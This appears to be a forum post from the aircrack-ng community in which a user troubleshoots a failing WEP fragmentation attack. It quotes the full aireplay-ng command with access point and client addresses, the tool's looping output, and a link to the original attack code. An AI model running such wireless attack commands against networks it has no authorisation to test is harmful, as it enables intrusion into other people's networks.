Hello,
I have downloaded the SVN version of aircrack-ng to try the fragmentation attack.
I am using atheros chipset and madwifi-ng drivers. Packet injection works on my system.
Here is what I run in monitor mode locked to AP channel:
./aireplay-ng -5 ath0 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -l 192.168.55.117
-b 00:14:6C:7E:40:80 Access Point
-h 00:0F:B5:AB:CB:9D mac address of associated client
-l 192.168.55.117 IP address of associated client
I get a continous stream of messages like this:
Trying to get 408 bytes of a keystream
No answer, repeating...
Still nothing, trying another packet...
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
I also tried the original code:
http://homepages.tu-darmstadt.de/~p_larbig/wlan/afrag-0.1.tar.bz2 and I am also not successful.
My questions:
- Is the command I used properly formatted?
- Which IP are you supposed to use? The client? A client on the ethernet? Etc.?
- On my access point when you use chopchop, it always has the warning "Warning: ICV checksum verification FAILED!". The xor stream can always be used successfully. Would this be a hint as to why the fragmentation attack does not work on my access point?
- Is there any debuging techiques I can use?
Thanks,
d.
Aircrack-ng
Author
Logged
(madwifi - patched & ubuntu dapper drake)
